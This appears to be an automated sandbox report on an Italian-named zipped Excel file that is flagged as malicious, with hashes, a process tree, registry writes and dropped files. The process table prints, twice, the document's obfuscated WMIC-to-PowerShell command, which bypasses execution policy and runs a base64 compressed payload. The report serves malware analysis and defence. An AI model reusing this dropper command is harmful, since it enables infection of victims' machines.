| File name: | FT_BONIFICO_2019_08_84_87.xls.zip |
| Full analysis: | https://app.any.run/tasks/e8561deb-cefb-40e1-b2cc-dd751948a49c |
| Verdict: | Malicious activity |
| Analysis date: | September 19, 2019, 08:22:25 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | A14CA8BAA98311F5B3F2EE9904EFB2CF |
| SHA1: | 638361DADD2BDE0666CB3E84369659A2118932B6 |
| SHA256: | 8E149B3D51BE6D6C0203AD0C1131EF36DAF97E4EF4B169A1D1BD90A70741AC1F |
| SSDEEP: | 768:F3LMhQIELzY/sp2IDXdwv8dKxk/Keezxy+tglFsIiIKzOfh:yWIEA3IuvORedy+tglFZrIOfh |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 788 |
|---|---|
| ZipBitFlag: | 0x0001 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2019:09:19 10:21:21 |
| ZipCRC: | 0x997a3482 |
| ZipCompressedSize: | 30214 |
| ZipUncompressedSize: | 60418 |
| ZipFileName: | FT_BONIFICO_2019_08_84_87.xls |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2068 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 2280 | C:\Windows\system32\mctadmin.exe | C:\Windows\system32\mctadmin.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MCTAdmin Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2712 | "C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cpl,,/p:"location" | C:\Windows\system32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2724 | wmIC 'PRocess' CalL "CREate" "POwerShelL -NOnIntERACtIvE -eXecuti BYPASs -WIn 00000000000000000000001 -NOPrOfi IeX ("\"sal Eii iEx; sal iiE nEw-OBjeCt;iEx(iiE SySTEM.Io.cOmpreSsiOn.DEfLateStReAm([iO.meMORYsTrEAm] [CONVeRT]::frOmBASE64sTrING('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')"\" + ([CHAR]44).ToStrIng() + "\" [iO.CompreSsiON.cOMpresSIoNModE]::DEcOMpreSS )| % {iiE SysTEM.Io.STrEamrEadEr( `$_"\" + ([CHAR]44).ToStrIng() + "\"[tExT.EnCODing]::ascii )}).ReadToENd();;ping -n 1 0"\")" | C:\Windows\System32\Wbem\wmIC.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3360 | POwerShelL -NOnIntERACtIvE -eXecuti BYPASs -WIn 00000000000000000000001 -NOPrOfi IeX ("\"sal Eii iEx; sal iiE nEw-OBjeCt;iEx(iiE SySTEM.Io.cOmpreSsiOn.DEfLateStReAm([iO.meMORYsTrEAm] [CONVeRT]::frOmBASE64sTrING('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')"\" + ([CHAR]44).ToStrIng() + "\" [iO.CompreSsiON.cOMpresSIoNModE]::DEcOMpreSS )| % {iiE SysTEM.Io.STrEamrEadEr( `$_"\" + ([CHAR]44).ToStrIng() + "\"[tExT.EnCODing]::ascii )}).ReadToENd();;ping -n 1 0"\") | C:\Windows\System32\WindowsPowerShell\v1.0\POwerShelL.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3520 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3540 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\FT_BONIFICO_2019_08_84_87.xls.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\FT_BONIFICO_2019_08_84_87.xls.zip | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (3540) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface |
| Operation: | write | Name: | ShowPassword |
Value: 0 | |||
| (PID) Process: | (2068) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
| Operation: | write | Name: | 4{$ |
Value: 347B240014080000010000000000000000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3540 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3540.36977\FT_BONIFICO_2019_08_84_87.xls | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRCB34.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBA5FCF8442777062.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF83333FB7BF259714.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFC8EB46E80C98B723.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF434BE89A5C3762A5.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF2EE18CAF6D6D2CBA.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF94CBF22C280ED097.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF14759501EDE827A8.TMP | — | |
MD5:— | SHA256:— | |||
| 2068 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFA7CD20C36775DC65.TMP | — | |
MD5:— | SHA256:— | |||